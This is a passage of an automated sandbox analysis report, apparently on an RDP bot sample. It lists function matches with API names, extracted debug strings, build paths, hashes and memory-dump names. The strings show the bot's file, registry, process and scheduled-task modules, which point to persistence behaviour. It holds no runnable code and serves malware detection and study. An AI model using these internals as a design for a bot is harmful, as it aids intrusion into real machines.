                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                  • API String ID: 3496426206-906809513
                  • Opcode ID: 3f4eedb711a649e55d310dacf8de06f5a5a49a2def36bbb7cec4131cbff512c4
                  • Instruction ID: 2d68b0e8b467762c8ddf8c2e24355932e07e4b4d2d7b564a43b61569ba2e5d27
                  • Opcode Fuzzy Hash: 3f4eedb711a649e55d310dacf8de06f5a5a49a2def36bbb7cec4131cbff512c4
                  • Instruction Fuzzy Hash: 74715E12B0C343C9FB657B18E8803B99251AB987C4FF401FADB5EC6695DE3DA885C321
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
                  • API String ID: 1332880857-1739142668
                  • Opcode ID: 7939dac208512d10af6a66e8bf5d27c779fb94e2900f7717edec28d96a0b39f0
                  • Instruction ID: b4b47218cc2862f249c08c6e0f3f03ed1a0add5f668a98811a0cc36351b3dd2e
                  • Opcode Fuzzy Hash: 7939dac208512d10af6a66e8bf5d27c779fb94e2900f7717edec28d96a0b39f0
                  • Instruction Fuzzy Hash: 56B18F7290C302D6F760A744E4407B8A292AFE13C8FB941BAD55ECB690CE7CFD858761
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
                  • API String ID: 1332880857-1739142668
                  • Opcode ID: 5e8814fb2432cf8713781d49c9d023d0b91865df381457722a0715df4d87d9e4
                  • Instruction ID: 2dade6a200ca0863d35eee9b80971a8614afd8e267ec7da84eb23884355d7db9
                  • Opcode Fuzzy Hash: 5e8814fb2432cf8713781d49c9d023d0b91865df381457722a0715df4d87d9e4
                  • Instruction Fuzzy Hash: 5BB18F62E0CE43C6F7208B96E85077C235AAF84774F2515BADA8E472B4DE7CED858301
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                  • String ID: (pi != NULL)$H:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                  • API String ID: 1879646588-3634134927
                  • Opcode ID: d8083e1282ff8dd82df0608f281ef9451730e539ff7042609b78cbcea3b2c2ad
                  • Instruction ID: d535b6ebff416cc52cdf79f4d26ee8287f15eba0e8919b387f51cf6ced3822de
                  • Opcode Fuzzy Hash: d8083e1282ff8dd82df0608f281ef9451730e539ff7042609b78cbcea3b2c2ad
                  • Instruction Fuzzy Hash: 6A81D222E0CE1786FB709797A4803BC62599F02774F2654FACC5E572B4DE2CBC849382
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: AttributesErrorFileLast
                  • String ID: $(attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                  • API String ID: 1799206407-2463373822
                  • Opcode ID: 65f0fbf948d4d226f17352df06bc4ea32ecc3c490979e5ba0d1a60200e6d5835
                  • Instruction ID: 96c0d6ea4f53e320159612b38943dc41284825e1594eac6bec025ff34b417359
                  • Opcode Fuzzy Hash: 65f0fbf948d4d226f17352df06bc4ea32ecc3c490979e5ba0d1a60200e6d5835
                  • Instruction Fuzzy Hash: AA515E61E0C717C5FB257B05A8803B9E2517F027D8FF401BAC96ECA6D0BE6DAA458331
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: AttributesErrorFileLast
                  • String ID: $(attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                  • API String ID: 1799206407-2463373822
                  • Opcode ID: 4d9df2951772254c967499a4228b22843900a401b1c47d39b5e3e2a1b9d8fad4
                  • Instruction ID: 420601cd02996d5ede770041eb000d546b6eedac7b0e130608d50b68eeb5286c
                  • Opcode Fuzzy Hash: 4d9df2951772254c967499a4228b22843900a401b1c47d39b5e3e2a1b9d8fad4
                  • Instruction Fuzzy Hash: CB51A1A190CE07DAFBA15B87A4407BE27197F407B8F1415BAC91E0A5F2FF6CA945C301
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                  • String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                  • API String ID: 1423203057-3539035513
                  • Opcode ID: f795b7b6bc23c65bdb57aee670771b5625fbdcaca3f78c2ea69e8484e5c5f790
                  • Instruction ID: b42ab947df0c89f15a82538a9c80cfaa0052c0ade9a2aaea9f1dac079e9df224
                  • Opcode Fuzzy Hash: f795b7b6bc23c65bdb57aee670771b5625fbdcaca3f78c2ea69e8484e5c5f790
                  • Instruction Fuzzy Hash: C9A1C362A0DE8291FB11CB97E8407BD676AAF40BA4F4440BAEECD477B5DE6CE545C300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: strlen$strncpy$strcat
                  • String ID: %SystemRoot%\System32\Tasks\$(config_path != NULL)$H:/Projects/rdp/bot/program-manager/schtasks.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$schtasks_check
                  • API String ID: 3175219844-2396484959
                  • Opcode ID: 98c9c9e3af5c1df847b95099f8c9bb74a7acef11151f3cd9e5867709a3f84f58
                  • Instruction ID: 31ad7ced48d61d1abc5ac449868ac6632b8e6cc8d88624a0a96c1095fab1e54a
                  • Opcode Fuzzy Hash: 98c9c9e3af5c1df847b95099f8c9bb74a7acef11151f3cd9e5867709a3f84f58
                  • Instruction Fuzzy Hash: 7A41E421B0CE8342FB119B67A8553FD67569B817A4F8841B5D94E0B6B6CF2CD64A8700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: ErrorLastMetricsSystem$fflushfwrite
                  • String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$H:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
                  • API String ID: 144387239-4168848430
                  • Opcode ID: 8ecad8ed2b97adc45959c9ac36f98e65daea784dbca03547dcc4ae02b3152b83
                  • Instruction ID: 37fed74fd681f5351be296c11564d85db6934cd52bcaebe8e619334bcd50fa68
                  • Opcode Fuzzy Hash: 8ecad8ed2b97adc45959c9ac36f98e65daea784dbca03547dcc4ae02b3152b83
                  • Instruction Fuzzy Hash: 5D714E50F0C747D5FBA1B728A84437AE1956F14B88FF000BAD50ECA3D4DD6CAD859721
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLastMetricsSystem$fflushfwrite
                  • String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$H:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
                  • API String ID: 144387239-4168848430
                  • Opcode ID: 85ecae58c040243c2ba47c642318a8e3d3def25d3ae6490dd87e8abd42941757
                  • Instruction ID: 98b933ffd8a5bdc630b0a4e56e52d54318e46222a4675d3506d20fcdabdf499b
                  • Opcode Fuzzy Hash: 85ecae58c040243c2ba47c642318a8e3d3def25d3ae6490dd87e8abd42941757
                  • Instruction Fuzzy Hash: 98714150B0CD4399F7A1979798443BE276E6F08379F4044BBD50F8A2F2EE6DA985C302
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                  • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                  • API String ID: 1721699506-2273971785
                  • Opcode ID: b81daba305cda5c1c45a0fc67c1a085ab3fe8e839dc70f9059648c7f8e50baf3
                  • Instruction ID: cd8de055f13fc0a746967c56b94e55261241b40588ab67f310337ed29610265c
                  • Opcode Fuzzy Hash: b81daba305cda5c1c45a0fc67c1a085ab3fe8e839dc70f9059648c7f8e50baf3
                  • Instruction Fuzzy Hash: 4F615EA1A0CD47D5FB219B97E8403BD265AAF40378FA941BAC50E471B4DF7CEA86C311
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                  • String ID: (hnd != NULL)$(out != NULL)$H:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                  • API String ID: 2123903355-1944070753
                  • Opcode ID: 307a2efdd69fb554138e3bebd3f7e8ff1701443d9c916b0dbfeb3d73ba67c19f
                  • Instruction ID: c3596d21a129301ca59cad6a5b6a24ceb3be6c4ddc6bd015972e8e6fe0b2a5ac
                  • Opcode Fuzzy Hash: 307a2efdd69fb554138e3bebd3f7e8ff1701443d9c916b0dbfeb3d73ba67c19f
                  • Instruction Fuzzy Hash: 50410C75A09342CAF751EF29E440569B7A0FB48798FA00275EA6DC3694EF3CE944CB20
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                  • String ID: (hnd != NULL)$(out != NULL)$H:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                  • API String ID: 2123903355-1944070753
                  • Opcode ID: a4e7fcd03440f43c5bac0c338a2e816e84c2f263d9a2879c62edf520cd84a144
                  • Instruction ID: a0d2cc4d999b2a983c7fd3bc3b3e1f3abd71d4accc9a5ae3c1e4a24d729a5af2
                  • Opcode Fuzzy Hash: a4e7fcd03440f43c5bac0c338a2e816e84c2f263d9a2879c62edf520cd84a144
                  • Instruction Fuzzy Hash: 6C414072A09A428BE751CF6AE48056977E5FB48764F400175EA5D837B8EF3CE844CB00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: strlen$strncpy
                  • String ID: (config_path != NULL)$/delete$/tn$H:/Projects/rdp/bot/program-manager/schtasks.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(config_path=%s,err=%08x)$[I] (%s) -> Done(config_path=%s)$h$schtasks.exe$schtasks_delete
                  • API String ID: 683370648-2373739955
                  • Opcode ID: 9cb641b43bf02df5efe46f43a787c30d1636080bcbf85cac401b10790b721592
                  • Instruction ID: 173b6d83569a87b8bb4f1d776b8842cdf80eb6bab1206a25daab6ff0137a75a0
                  • Opcode Fuzzy Hash: 9cb641b43bf02df5efe46f43a787c30d1636080bcbf85cac401b10790b721592
                  • Instruction Fuzzy Hash: 0641E022A08E8395FB119B9AE4903FD635AAB44364F8401B5DA4D07BB5EF7DD60AC700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: CloseCreate
                  • String ID: (key != NULL)$(root != NULL)$?$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
                  • API String ID: 2932200918-412249795
                  • Opcode ID: d4ad317a5d25cb66575cc11d0ac7b0f0c4753baf6b14eb3bf7d34ecfe1b293f9
                  • Instruction ID: 1db51c1219fa07eee9769731cbfadafc87abdf231cfad3457340a513a32758b3
                  • Opcode Fuzzy Hash: d4ad317a5d25cb66575cc11d0ac7b0f0c4753baf6b14eb3bf7d34ecfe1b293f9
                  • Instruction Fuzzy Hash: 42518866E0C753C6FA21BB48A4407B8E251AB003D4FF441BAD99DC76A4DE2DED84C760
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: CloseCreate
                  • String ID: (key != NULL)$(root != NULL)$?$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
                  • API String ID: 2932200918-412249795
                  • Opcode ID: e247092232c6130ceeddb164c3eff23dd30a03f2928e678fc261eb6db4f7f740
                  • Instruction ID: 21d7bbd0d52dc7eabb092a351198ed1e042b1c4278febea800ef09cd2aaee2d3
                  • Opcode Fuzzy Hash: e247092232c6130ceeddb164c3eff23dd30a03f2928e678fc261eb6db4f7f740
                  • Instruction Fuzzy Hash: D451F062E0CE9391FB318B8AE940BBC6259AF147B4F4601BAD84D472B8DF6DED44C740
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: strlen
